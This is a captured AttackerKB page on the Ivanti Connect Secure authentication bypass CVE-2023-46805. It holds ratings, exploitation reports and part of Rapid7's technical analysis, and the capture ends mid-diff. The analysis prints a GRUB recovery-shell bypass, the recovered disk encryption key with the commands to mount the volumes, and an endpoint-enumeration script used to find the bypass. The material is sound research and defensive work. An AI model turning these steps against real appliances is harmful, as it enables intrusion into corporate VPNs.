attackerkb.com
Submitted URL: https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805?referrer=notificationEmail#rapid7-analysis
Effective URL: https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805?referrer=notificationEmail
Submission: On February 22 via api from RU — Scanned from DE
AttackerKB, a Rapid7 project

CVE-2023-46805

Attacker Value: VERY HIGH (1 user assessed)
Exploitability: MODERATE (1 user assessed)
User Interaction: NONE
Privileges Required: NONE
Attack Vector: NETWORK
Disclosure Date: January 12, 2024 (Last updated January 16, 2024)
CVSS v3 Base Score: 8.2
Exploited in the Wild: Reported by cbeek-r7 and 2 more
Kernel Modules and Extensions Boot or Logon Autostart Execution: Re-opened Applications Boot or Logon Autostart Execution: LSASS Driver Boot or Logon Autostart Execution: Shortcut Modification Boot or Logon Autostart Execution: Port Monitors Boot or Logon Autostart Execution: Plist Modification Abuse Elevation Control Mechanism Abuse Elevation Control Mechanism: Setuid and Setgid Abuse Elevation Control Mechanism: Bypass User Access Control Abuse Elevation Control Mechanism: Sudo and Sudo Caching Abuse Elevation Control Mechanism: Elevated Execution with Prompt Hijack Execution Flow Hijack Execution Flow: DLL Search Order Hijacking Hijack Execution Flow: DLL Side-Loading Hijack Execution Flow: Dylib Hijacking Hijack Execution Flow: Executable Installer File Permissions Weakness Hijack Execution Flow: LD_PRELOAD Hijack Execution Flow: Path Interception by PATH Environment Variable Hijack Execution Flow: Path Interception by Search Order Hijacking Hijack Execution Flow: Path Interception by Unquoted Path Hijack Execution Flow: Services File Permissions Weakness Hijack Execution Flow: Services Registry Permissions Weakness Hijack Execution Flow: COR_PROFILER Submit Metasploit Module exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805 CISA KEV ListedCommon in enterpriseGives privileged accessObserved in nation state sponsored attacksUnauthenticatedVulnerable in default configuration TOPIC TAGS Select the tags that apply to this CVE (Assessment added tags are disabled and cannot be removed) What makes this of high-value to an attacker? Vulnerable in default configuration Unauthenticated Observed in ransomware attacks Observed in nation state sponsored attacks Gives privileged access Easy to weaponize Difficult to patch Common in enterprise CISA KEV Listed What makes this of low-value to an attacker? 
DESCRIPTION

An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.

RATINGS & ANALYSIS

cbeek-r7 (94), January 11, 2024 10:43am UTC (edited)

RATINGS
Attacker Value: Very High
Exploitability: Medium
Tags: CISA KEV Listed, Common in enterprise, Gives privileged access, Observed in nation state sponsored attacks, Unauthenticated, Vulnerable in default configuration

TECHNICAL ANALYSIS

CVE-2023-46805 is an authentication bypass vulnerability found in the web component of Ivanti Connect Secure (ICS), which was previously known as Pulse Connect Secure and Ivanti Policy Secure. This vulnerability affects all supported versions of Ivanti ICS and Policy Secure 9.x and 22.x.

Details of CVE-2023-46805:

* The vulnerability allows an attacker to bypass control checks and access restricted resources.
* It was exploited in the wild in a chained attack for unauthenticated remote code execution (RCE) as early as December 2023.
* According to Volexity, a cybersecurity firm, the zero-day exploitation of these flaws was attributed to UTA0178, believed to be a Chinese nation-state level threat actor.
* The attackers deployed webshells, including GLASSTOKEN, on both internet-facing and internal assets to maintain persistence on a network after compromise.

Mitigation and Updates:

* As of the latest information, Ivanti has not released a patch for this vulnerability. However, they provided a mitigation script that should be used immediately.
* Ivanti announced that patches for this vulnerability would be released in a staggered schedule, with the first version targeted to be available in the week of 22 January 2024 and the final version by the week of 19 February 2024.
* Users and administrators of affected product versions are advised to apply mitigation measures provided by Ivanti.

Impact and Detection:

* Attackers modified legitimate components of Ivanti Connect Secure, such as compcheck.cgi and lastauthserverused.js, to support execution of remote commands and credential theft.
* Organizations can detect potential compromise through network traffic analysis, VPN device log analysis, and execution of the Integrity Checker Tool.

Recommendation:

* It is crucial for users and administrators to apply the current workarounds immediately and to update the systems once patches are released.
* Monitoring for signs of compromise is recommended, including examining network traffic and VPN device logs.
CVSS V3 SEVERITY AND METRICS

Data provided by the National Vulnerability Database (NVD)

Base Score: 8.2 High
Impact Score: 4.2
Exploitability Score: 3.9
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): Low
Availability (A): None

GENERAL INFORMATION

Vulnerable Versions: ICS 9.1R18, ICS 22.6R2, IPS 9.1R18, IPS 22.6R1
Offensive Application, Utility Class, Ports, OS, Prerequisites, Discovered By, PoC Author, Metasploit Module, Reporter: Unknown

VENDORS

* ivanti

PRODUCTS

* connect secure 9.0, 9.1, 22.1, 22.2, 22.3, 22.4, 22.5, 22.6
* policy secure 9.0, 9.1, 22.1, 22.2, 22.3, 22.4, 22.5, 22.6

METASPLOIT MODULES

exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805 (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb)

EXPLOITED IN THE WILD

cbeek-r7 indicated source as Government or Industry Alert (https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/). Reported: January 11, 2024 10:40am UTC (edited).
inokii indicated sources as Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog) and Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2024/01/10/cisa-adds-two-known-exploited-vulnerabilities-catalog). Reported: January 17, 2024 5:51am UTC.

ccondon-r7 indicated source as Threat Feed (https://twitter.com/felixaime/status/1749454051601776979). Reported: January 27, 2024 8:08pm UTC.

REFERENCES

Canonical: CVE-2023-46805 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46805)
Advisory: CSA (https://www.csa.gov.sg/alerts-advisories/alerts/2024/al-2024-002); CISA (https://www.cisa.gov/news-events/alerts/2024/01/10/ivanti-releases-security-update-connect-secure-and-policy-secure-gateways)
Exploit: https://github.com/rapid7/metasploit-framework/pull/18708
Miscellaneous: https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US; http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html

ADDITIONAL INFO

Authenticated, Exploitable, Reliability, Stability, Available Mitigations, Shelf Life, Userbase/Installbase, Patch Effectiveness: Unknown

Rapid7, January 16, 2024 1:14pm UTC (last updated January 16, 2024 3:17pm UTC)

TECHNICAL ANALYSIS

OVERVIEW

Starting January 10, 2024, multiple parties (Ivanti, Volexity, and Mandiant) disclosed the existence of a zero-day exploit chain affecting Ivanti Connect Secure (previously called Pulse Connect Secure) and Ivanti Policy Secure gateway. This exploit chain was exploited in the wild circa December 2023.
The exploit chain consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected. This analysis will detail our findings against Ivanti Connect Secure version 22.3R1 (build 1647).

JAILBREAKING THE APPLIANCE

The version of Ivanti Connect Secure we tested is distributed as a virtual appliance that can run on either VMware or Hyper-V. After installing the appliance via Hyper-V and letting it run for a while, we took a snapshot of the VM and saved the virtual hard disk to a VHD file. We then mounted this VHD in a separate Ubuntu Linux VM so we could begin to inspect the contents. We quickly learn that the majority of partitions are LUKS encrypted, and we cannot access them without a key or a jailbreak, i.e. getting a root shell on the device somehow.

Prior work by Orange Tsai and Meh Chang in 2019 against Pulse Connect Secure (Infiltrating Corporate Intranet Like NSA (PDF)) showed how to jailbreak the appliance by patching an initialization script's path in memory, during a specific point in the boot process. This allowed a root shell to be spawned and gave full access to the mounted filesystem. Unfortunately this technique no longer works.

On January 13, 2024, watchTowr Labs published a blog that demonstrated how they managed to jailbreak the appliance by dropping to a Grub bootloader recovery shell using a novel technique that bypasses an attempt at blocking the default recovery shell. Using this technique, we were able to recover the encryption key for the appliance. First we boot the appliance and, from Grub, we press e to edit the current configuration.
We use the watchTowr technique and append the parameter init=//bin/sh to bypass the recovery shell filtering (/bin/sh is blocked, but an alternative path such as //bin/sh will work). We then press F10 to boot, and are dropped to a shell.

We dump the contents of the 16 byte encryption key via the command cat -Ev /etc/lvmkey. The -v switch will output the file's contents using an obscure notation that uses ^ and M- sequences to encode non-ASCII characters (a decoding table can be found here). We do this as we found no other way to exfiltrate the 16 byte key from the recovery shell. We also use the switch -E to display the $ symbol for the new line char, as coincidentally the key contains this character. Using this notation, we learn that the key is $M-9M-^^M-OM-^IuNM-G`^XM-J^NM-Z]jM-G, and when converted into hex notation this becomes 0ab99ecf89754ec76018ca0eda5d6ac7.

Knowing the decryption key we can now successfully mount the encrypted volumes via the following sequence of commands:

    # Install required tools...
    $ sudo apt install lvm2
    $ sudo apt install cryptsetup-bin

    # Detect the volumes...
    $ sudo vgscan
      Found volume group "groupA" using metadata type lvm2
      Found volume group "groupZ" using metadata type lvm2
    $ sudo vgchange -ay groupA
      2 logical volume(s) in volume group "groupA" now active
    $ sudo vgchange -ay groupZ
      1 logical volume(s) in volume group "groupZ" now active
    $ sudo lvs
      LV      VG     Attr       LSize Pool Origin Data%  Meta%  Move Log Cpy%Sync Convert
      home    groupA -wi-a----- 3.50g
      runtime groupA -wi-a----- 8.80g
      home    groupZ -wi-a----- 3.00g

    # Write the LUKS decryption key to a file...
    $ echo -n 0ab99ecf89754ec76018ca0eda5d6ac7 | xxd -r -p - > key.bin

    # Open the 3 volumes...
    $ sudo cryptsetup luksOpen -d key.bin /dev/groupA/home ics_disk1
    $ sudo cryptsetup luksOpen -d key.bin /dev/groupA/runtime ics_disk2
    $ sudo cryptsetup luksOpen -d key.bin /dev/groupZ/home ics_disk3

    # Mount the 3 volumes...
    $ mkdir ics_disk1 ics_disk2 ics_disk3
    $ sudo mount /dev/mapper/ics_disk1 ics_disk1/
    $ sudo mount /dev/mapper/ics_disk2 ics_disk2/
    $ sudo mount /dev/mapper/ics_disk3 ics_disk3/

    # Verify we can access the appliance files...
    $ cat ics_disk1/root/home/ssl-vpn-VERSION
    export DSREL_MAJOR=22
    export DSREL_MINOR=3
    export DSREL_MAINT=1
    export DSREL_DATAVER=4802
    export DSREL_PRODUCT=ssl-vpn
    export DSREL_DEPS=ive
    export DSREL_BUILDNUM=1647
    export DSREL_COMMENT="R1"

Of the three encrypted volumes, the first volume, which we mounted as ics_disk1, contains the application code used throughout the below analysis.

BYPASSING AUTHENTICATION

There is not a lot of information to go on when trying to identify the vulnerabilities in this exploit chain. We have two pieces of information, an XML file from the vendor which can apply a "mitigation" to a vulnerable system, and the description of the auth bypass according to the vendor:

> An authentication bypass vulnerability in the web component of Ivanti Connect
> Secure (9.x, 22.x) and Ivanti Policy Secure allows a remote attacker to access
> restricted resources by bypassing control checks.

The CVE mentions the web component is affected, and that control checks can be bypassed, so we begin by investigating how the appliance's web component operates and in particular, how it enforces access controls. We identified a custom web server written in C++ and located in the binary ics_disk1/root/home/bin/web. This server will handle all incoming HTTPS requests for numerous resources, including Perl based CGI scripts and a Python based REST API. The REST API is implemented as a separate Python Flask application, and listens on a locally bound TCP port 8090. The REST API endpoints are implemented via the code located in ics_disk1/root/home/venv3/lib/python3.6/site-packages/restservice-0.1-py3.6.egg.
The native code web server will proxy requests to this REST server as needed, and authentication is enforced in the native web server and not in the Flask application. We begin by pulling all URI endpoints that have been hard coded into both the native code web server binary and the Python based REST server source code. A simple Ruby script is then used to request all endpoints and record their HTTP response code.

    require 'httparty'
    require 'json'

    # pulled from restservice-0.1-py3.6/restservice/api/__init__.py and /root/home/bin/web
    endpoints = [
      "/_/api/aaa", "/api/", "/api/my-session",
      "/api/private/v1/classic-admin-ui", "/api/private/v1/cluster/password", "/api/private/v1/controller-changeset",
      "/api/private/v1/license/watermarks/<path:url_suffix>", "/api/private/v1/totp/server-status",
      "/api/private/v1/totp/user-backup-code", "/api/private/v1/totp/user-login",
      "/api/v1/", "/api/v1/auth", "/api/v1/cav", "/api/v1/cav/", "/api/v1/cav/client/", "/api/v1/cav/client/auth_token",
      "/api/v1/cluster", "/api/v1/cluster/", "/api/v1/cluster/<path:section>",
      "/api/v1/configuration", "/api/v1/configuration/", "/api/v1/configuration/<path:configuration_path>",
      "/api/v1/configuration/auth/ace-server/log-table", "/api/v1/dsintegration",
      "/api/v1/enduser", "/api/v1/enduser/autolaunch-client-apps", "/api/v1/enduser/bkm-panel-pref",
      "/api/v1/enduser/cached-passwords", "/api/v1/enduser/client/applaunchtoken", "/api/v1/enduser/client/applaunchtoken/status",
      "/api/v1/enduser/client/installer", "/api/v1/enduser/custom-html5-bookmark", "/api/v1/enduser/custom-html5-bookmark/input-text",
      "/api/v1/enduser/custom-ts-bookmark", "/api/v1/enduser/custom-ts-bookmark/input-text", "/api/v1/enduser/custom-unix-file-bookmark",
      "/api/v1/enduser/custom-web-bookmark", "/api/v1/enduser/custom-web-bookmark/input-text", "/api/v1/enduser/custom-windows-file-bookmark",
      "/api/v1/enduser/delete-user-admin", "/api/v1/enduser/display-mode", "/api/v1/enduser/display-unix-dir",
"/api/v1/enduser/display-windows-dir", "/api/v1/enduser/fb/unix-file-download", "/api/v1/enduser/fb/unix-zip-download", "/api/v1/enduser/fb/win-file-download", "/api/v1/enduser/fb/win-zip-download", "/api/v1/enduser/full", "/api/v1/enduser/heartbeat", "/api/v1/enduser/host-resolve-status", "/api/v1/enduser/html5-remote-desktop-launcher", "/api/v1/enduser/jsam/apps-reorder", "/api/v1/enduser/jsam/custom-client-apps", "/api/v1/enduser/jsam/list-client-apps", "/api/v1/enduser/jsam/restore-system-settings", "/api/v1/enduser/landing-page", "/api/v1/enduser/landing-page/browse", "/api/v1/enduser/logo-img", "/api/v1/enduser/onboarding/profile-secure", "/api/v1/enduser/panel_order", "/api/v1/enduser/password", "/api/v1/enduser/rdp-launcher", "/api/v1/enduser/server-cookies", "/api/v1/enduser/totp-backup-codes", "/api/v1/enterprise-onboard/csr-template-status", "/api/v1/enterprise-onboard/scep-configuration", "/api/v1/esapdata", "/api/v1/fb/create-folder", "/api/v1/fb/create-folder-unix", "/api/v1/fb/list", "/api/v1/fb/list-unix", "/api/v1/fb/set-credentials", "/api/v1/fb/unix/upload", "/api/v1/fb/windows/upload", "/api/v1/gateways", "/api/v1/host-checker/live-update/validate-credentials", "/api/v1/integration/", "/api/v1/license/auth-code", "/api/v1/license/enforcement", "/api/v1/license/enforcement/", "/api/v1/license/ice", "/api/v1/license/ice/", "/api/v1/license/keys-status", "/api/v1/license/keys-status/<path:node_name>", "/api/v1/license/leased-license-info", "/api/v1/license/leased-license-info/", "/api/v1/license/license-agreement-text", "/api/v1/license/license-capacity", "/api/v1/license/license-capacity/", "/api/v1/license/license-client-lease-state", "/api/v1/license/license-clients", "/api/v1/license/license-key", "/api/v1/license/license-server-last-contact-time", "/api/v1/license/license-server-lease-information", "/api/v1/license/max-licensed-concurrent-users", "/api/v1/license/named-users", "/api/v1/license/named-users/pcs", 
"/api/v1/license/named-users/pps", "/api/v1/license/nsalicense/delete-named-user", "/api/v1/license/pcls/last-contact-time", "/api/v1/license/report", "/api/v1/license/report/", "/api/v1/license/report/<path:url_suffix>", "/api/v1/logs", "/api/v1/logs/<path:section>", "/api/v1/metrics", "/api/v1/network", "/api/v1/network/<path:section>", "/api/v1/nsa/register", "/api/v1/nsa/registration-status", "/api/v1/oidc", "/api/v1/pps/action/", "/api/v1/profiler/", "/api/v1/profiler/auth", "/api/v1/profiler/exchange", "/api/v1/profiler/filter", "/api/v1/profiler/ws", "/api/v1/pulse-client", "/api/v1/pulse-client/component-settings/<path:url_suffix>", "/api/v1/pulse-one", "/api/v1/pulse-one/<path:section>", "/api/v1/realm_auth", "/api/v1/saml-", "/api/v1/saml-config/<path:auth_server_name>/download-metadata", "/api/v1/saml-config/<path:metadata_provider_name>", "/api/v1/saml-config/idp", "/api/v1/saml-config/idp/download-signin-metadata", "/api/v1/saml-config/sp", "/api/v1/sdpotp", "/api/v1/snmp/download-mib", "/api/v1/snmpv3", "/api/v1/snmpv3/<path:section>", "/api/v1/stats", "/api/v1/stats/", "/api/v1/stats/<path:url_suffix>", "/api/v1/system/active-users", "/api/v1/system/active-users/session/<path:url_suffix>", "/api/v1/system/ai-configs/<path:section>", "/api/v1/system/auth-server/mdm", "/api/v1/system/auth-server/totp", "/api/v1/system/auth/aaa-ports-list", "/api/v1/system/auth/auth-server/<path:auth_server>/api-key", "/api/v1/system/auth/auth-server/<path:auth_server>/groups", "/api/v1/system/auth/auth-server/<path:auth_server_name>", "/api/v1/system/auth/auth-server/<path:auth_server_name>/troubleshoot", "/api/v1/system/auth/auth-server/<path:auth_server_name>/users", "/api/v1/system/auth/auth-server/api-key-without-saving", "/api/v1/system/auth/auth-server/ldap-test-connection", "/api/v1/system/auth/auth-server/simulate-variables", "/api/v1/system/binary-configuration", "/api/v1/system/certificates/client-auth-certificate", 
"/api/v1/system/certificates/client-auth-certificate-csrs", "/api/v1/system/certificates/client-auth-certificate-csrs/", "/api/v1/system/certificates/client-auth-certificate-csrs/<path:url_suffix>", "/api/v1/system/certificates/client-ca", "/api/v1/system/certificates/code-signing-certificates", "/api/v1/system/certificates/crl", "/api/v1/system/certificates/device-certificate", "/api/v1/system/certificates/device-certificate-csrs", "/api/v1/system/certificates/device-certificate-csrs/", "/api/v1/system/certificates/device-certificate-csrs/<path:url_suffix>", "/api/v1/system/certificates/device-certificates", "/api/v1/system/certificates/device-certificates/<path:url_suffix>", "/api/v1/system/certificates/expiring-certificates", "/api/v1/system/certificates/global-onboarding-certificate", "/api/v1/system/certificates/intermediate-ca", "/api/v1/system/certificates/server-ca", "/api/v1/system/certificates/smime-certificate", "/api/v1/system/date-time", "/api/v1/system/delete-records", "/api/v1/system/failed-login-count", "/api/v1/system/healthcheck", "/api/v1/system/ifmap/imported-sessions", "/api/v1/system/ifmap/imported-sessions/<path:url_suffix>", "/api/v1/system/maintenance", "/api/v1/system/maintenance/archiving/cloud-server-test-connection", "/api/v1/system/maintenance/archiving/localbackup", "/api/v1/system/maintenance/export-universal-xml", "/api/v1/system/maintenance/export-xml", "/api/v1/system/maintenance/import-xml", "/api/v1/system/maintenance/options", "/api/v1/system/maintenance/password-protection", "/api/v1/system/maintenance/upgrade", "/api/v1/system/platform", "/api/v1/system/resource-profiles/web-profile/<path:applet_name>", "/api/v1/system/saml/metadata-server-configuration", "/api/v1/system/status/<path:section>", "/api/v1/system/status/active-sync-devices", "/api/v1/system/status/active-sync-devices/<path:active_sync_session_id>", "/api/v1/system/status/active-sync-devices/<path:active_sync_session_id>/allow-access", 
"/api/v1/system/status/active-sync-devices/<path:active_sync_session_id>/block-access", "/api/v1/system/status/ntp", "/api/v1/system/status/overview", "/api/v1/system/system-information", "/api/v1/system/user-record-synchronization", "/api/v1/system/user-record-synchronization/database/delete", "/api/v1/system/user-record-synchronization/database/export", "/api/v1/system/user-record-synchronization/database/import", "/api/v1/system/user-record-synchronization/database/retrieve-stats", "/api/v1/system/user-roles/<role_name>", "/api/v1/system/user-roles/vlansourceip", "/api/v1/system/user-stats", "/api/v1/tasks", "/api/v1/tenant/status", "/api/v1/totp/<totpSrv>/users", "/api/v1/totp/<totpSrv>/users/", "/api/v1/totp/<totpSrv>/users/<user>", "/api/v1/totp/<totpSrv>/users/<user>/", "/api/v1/totp/user-backup-code", "/api/v1/ueba/", "/api/v1/users/resource-profile/<path:profile_name>", "/api/v1/users/resource-profile/virtual-desktops-list", "/dana", "/dana-", "/dana-admin/", "/dana-admin/download/", "/dana-admin/mail/", "/dana-admin/snmp/", "/dana-cached/", "/dana-cached/cbox/", "/dana-cached/cc/", "/dana-cached/css/", "/dana-cached/ep/", "/dana-cached/fb/", "/dana-cached/fb/nfs/nfv.cgi", "/dana-cached/fb/smb/wfv.cgi", "/dana-cached/hc/", "/dana-cached/imgs/", "/dana-cached/js/shimdata.cgi", "/dana-cached/psal/", "/dana-cached/remediation/", "/dana-cached/sc/", "/dana-cached/sc/PulseInstallerServiceVersion.txt", "/dana-cached/setup/", "/dana-cached/term/", "/dana-cached/themes/", "/dana-cached/webapplets", "/dana-cached/ws/", "/dana-html5acc", "/dana-html5bssl", "/dana-na", "/dana-na/", "/dana-na/auth", "/dana-na/auth/", "/dana-na/auth/AAAAAAAA/welcome.cgi", "/dana-na/auth/AAAAAAAA/welcome.cgi?p=no-access", "/dana-na/auth/AAAAAAAA/welcome.cgi?p=ssl-weak", "/dana-na/auth/AAAAAAAA/welcome.cgi?p=timed-out", "/dana-na/auth/AAAAAAAAAAAAAAAA/welcome.cgi", "/dana-na/auth/logout.cgi", "/dana-na/auth/recover.cgi", "/dana-na/auth/restAuth.cgi", "/dana-na/auth/saml-sso.cgi", 
"/dana-na/auth/welcome.", "/dana-na/auth/welcome.cgi?p=denied-checkhostname", "/dana-na/auth/welcome.cgi?p=forced-off", "/dana-na/auth/welcome.cgi?p=ssl-renego", "/dana-na/auth/welcome.cgi?p=timed-out", "/dana-na/auth/welcome.cgi?p=user-unknown", "/dana-na/css/", "/dana-na/healthcheck/healthcheck.cgi", "/dana-na/html/blank.html", "/dana-na/imgs/", "/dana-na/meeting/", "/dana-na/meeting/AAAAAAAAAAAAAAAA/login_meeting.cgi", "/dana-na/meeting/login_meeting.cgi", "/dana-na/nc/nc_gina_ver.txt", "/dana-na/neoteriswatchdogprocess/ping", "/dana-na/setup/psalinstall.cgi", "/dana-na/ws/", "/dana-ws/metric/", "/dana-ws/namedusers/", "/dana-ws/namedusers/PCS", "/dana-ws/namedusers/PPS", "/dana-ws/saml.ws", "/dana-ws/saml20.ws", "/dana-ws/samlecp.ws", "/dana-ws/soap/", "/dana-ws/soap/dsifmap", "/dana/", "/dana/asm/asmrun.cgi?ppc_wsam_not_installed", "/dana/cs/cs.cgi", "/dana/cs/cs_add.cgi", "/dana/cs/csdbg.cgi", "/dana/cs/jsammessages", "/dana/download", "/dana/download/", "/dana/error/AccessBlocked.msg", "/dana/error/BadCgiOutput.msg", "/dana/error/BadContent.msg", "/dana/error/CannotConnect.msg", "/dana/error/CannotReadFromOrigServer.msg", "/dana/error/CgiDied.msg", "/dana/error/CgiFailed.msg", "/dana/error/CgiNotExecutable.msg", "/dana/error/ExcessiveRequestSize.msg", "/dana/error/FormPostAutoRedirect.msg", "/dana/error/FormPostBlocked.msg", "/dana/error/InternalError.msg", "/dana/error/InvalidContentLength.msg", "/dana/error/InvalidHostHeader.msg", "/dana/error/InvalidOnBoardingURL.msg", "/dana/error/InvalidPath.msg", "/dana/error/InvalidPathDisallowedChars.msg", "/dana/error/InvalidSSLSiteConfirm.msg", "/dana/error/InvalidSSLSiteDisabled.msg", "/dana/error/MethodDisallowed.msg", "/dana/error/NTLMFail.msg", "/dana/error/NewSSLConnFail.msg", "/dana/error/OutOfDescriptors.msg", "/dana/error/PageNotFound.msg", "/dana/error/PlatformNotSupported.msg", "/dana/error/ResolveHostnameFail.msg", "/dana/error/RewritingBlocked.msg", "/dana/error/TooManyOnboardRequest.msg", 
      "/dana/error/UserLoginYellowBarMessage.msg", "/dana/error/WebProxyProcessFail.msg", "/dana/error/WebSSOFailed.msg",
      "/dana/error/finishReadingPostBody.msg", "/dana/fb/", "/dana/fb/nfs/addnsh.cgi", "/dana/fb/nfs/nfb.cgi",
      "/dana/fb/nfs/nfmd.cgi", "/dana/fb/nfs/nnf.cgi", "/dana/fb/nfs/nu.cgi", "/dana/fb/nfs/snsrv.cgi",
      "/dana/fb/smb", "/dana/fb/smb/addwsh.cgi", "/dana/fb/smb/rd.cgi", "/dana/fb/smb/swg.cgi", "/dana/fb/smb/wfb.cgi",
      "/dana/fb/smb/wfmd.cgi", "/dana/fb/smb/wnf.cgi", "/dana/fb/smb/wu.cgi",
      "/dana/home", "/dana/home/activexparams.cgi", "/dana/home/applaunchtoken.cgi", "/dana/home/editbk.cgi",
      "/dana/home/getProfileSecure.cgi", "/dana/home/homepage.cgi", "/dana/home/index.cgi", "/dana/home/index_data.cgi",
      "/dana/home/infranet.cgi", "/dana/home/infranet_data.cgi", "/dana/home/installfailed.cgi", "/dana/home/launch.cgi",
      "/dana/home/launch.cgi?", "/dana/home/netehpl.cgi", "/dana/home/netestarter.cgi?url=", "/dana/home/norefr.cgi",
      "/dana/home/onboarding.cgi", "/dana/home/onboarding_device.cgi", "/dana/home/panelpref.cgi", "/dana/home/psalwait.cgi",
      "/dana/home/starter.cgi", "/dana/home/starter.cgi?startpageonly=1", "/dana/home/starter0",
      "/dana/html5acc/guacamole/", "/dana/j", "/dana/jr?", "/dana/js", "/dana/js?", "/dana/jw?", "/dana/jz?",
      "/dana/pref/advpref.cgi", "/dana/pref/applications.cgi", "/dana/pref/pref.cgi", "/dana/pref/useradm.cgi",
      "/dana/pref/userhome.cgi", "/dana/psalbrowser-extension/", "/dana/term", "/dana/term/addhtml5acc.cgi",
      "/dana/term/winaddterm.cgi", "/dana/term/winlaunchterm.cgi", "/dana/uploadlog/uploadlog.cgi", "/dana/user/",
    ]

    target = 'https://192.168.86.111'
    # Self-signed appliance certificate: skip TLS verification for this lab scan.
    HTTParty::Basement.default_options.update(verify: false)

    endpoints.each do |endpoint|
      # Replace route placeholders such as <path:url_suffix> with a fixed dummy value.
      # (The original pattern /(<\S+>)/ was greedy and collapsed routes carrying two
      # placeholders, e.g. /<totpSrv>/users/<user>, into a single run of As; that is how
      # those routes appear in the results below.)
      endpoint.gsub!(/<[^>]+>/, 'A' * 32)
      # Record the raw status for each verb; redirects are not followed so that a 302
      # from the native server is visible as such.
      %w[get post put delete].each do |verb|
        begin
          response = HTTParty.public_send(verb, "#{target}#{endpoint}", follow_redirects: false)
          p "#{verb.upcase}, #{response.code}, #{endpoint}"
        rescue StandardError
          p "#{verb.upcase}, timeout, #{endpoint}"
        end
      end
    end

We run this script twice, first against an instance of Ivanti Connect Secure that does not have the mitigation file applied, and a second time against an instance of Ivanti Connect Secure that does have the mitigation file applied. Comparing the results of these two files shows the following:

diff --git a/all_endpoints_no_mitigation.txt b/all_endpoints_yes_mitigation.txt index 0411078..c7c8111 100644 --- a/all_endpoints_no_mitigation.txt +++ b/all_endpoints_yes_mitigation.txt @@ -22,10 +22,10 @@ "POST, 403, /api/private/v1/controller-changeset" "PUT, 403, /api/private/v1/controller-changeset" "DELETE, 403, /api/private/v1/controller-changeset" -"GET, 302, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"POST, 302, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"PUT, 302, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"DELETE, 302, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +"GET, 403, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +"POST, 403, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +"PUT, 403, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +"DELETE, 403, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "GET, 403, /api/private/v1/totp/server-status" "POST, 403, /api/private/v1/totp/server-status" "PUT, 403, /api/private/v1/totp/server-status"
@@ -38,30 +38,30 @@ "POST, 403, /api/private/v1/totp/user-login" "PUT, 403, /api/private/v1/totp/user-login" "DELETE, 403, /api/private/v1/totp/user-login" -"GET, 302, /api/v1/" -"POST, 302, /api/v1/" -"PUT, 302, /api/v1/" -"DELETE, 302, /api/v1/" +"GET, 403, /api/v1/" +"POST, 403, /api/v1/" +"PUT, 403, /api/v1/" +"DELETE, 403, /api/v1/" "GET, 403, /api/v1/auth" "POST, 403, /api/v1/auth" "PUT, 403, /api/v1/auth" "DELETE, 403, /api/v1/auth" -"GET, 302, /api/v1/cav" -"POST, 302, /api/v1/cav" -"PUT, 302, /api/v1/cav" -"DELETE, 302, /api/v1/cav" -"GET, 302, /api/v1/cav/" -"POST, 302, /api/v1/cav/" -"PUT, 302, /api/v1/cav/" -"DELETE, 302, /api/v1/cav/" -"GET, 404, /api/v1/cav/client/" -"POST, 404, /api/v1/cav/client/" -"PUT, 404, /api/v1/cav/client/" -"DELETE, 404, /api/v1/cav/client/" -"GET, 302, /api/v1/cav/client/auth_token" -"POST, 302, /api/v1/cav/client/auth_token" -"PUT, 302, /api/v1/cav/client/auth_token" -"DELETE, 302, /api/v1/cav/client/auth_token" +"GET, 403, /api/v1/cav" +"POST, 403, /api/v1/cav" +"PUT, 403, /api/v1/cav" +"DELETE, 403, /api/v1/cav" +"GET, 403, /api/v1/cav/" +"POST, 403, /api/v1/cav/" +"PUT, 403, /api/v1/cav/" +"DELETE, 403, /api/v1/cav/" +"GET, 403, /api/v1/cav/client/" +"POST, 403, /api/v1/cav/client/" +"PUT, 403, /api/v1/cav/client/" +"DELETE, 403, /api/v1/cav/client/" +"GET, 403, /api/v1/cav/client/auth_token" +"POST, 403, /api/v1/cav/client/auth_token" +"PUT, 403, /api/v1/cav/client/auth_token" +"DELETE, 403, /api/v1/cav/client/auth_token" "GET, 403, /api/v1/cluster" "POST, 403, /api/v1/cluster" "PUT, 403, /api/v1/cluster" 
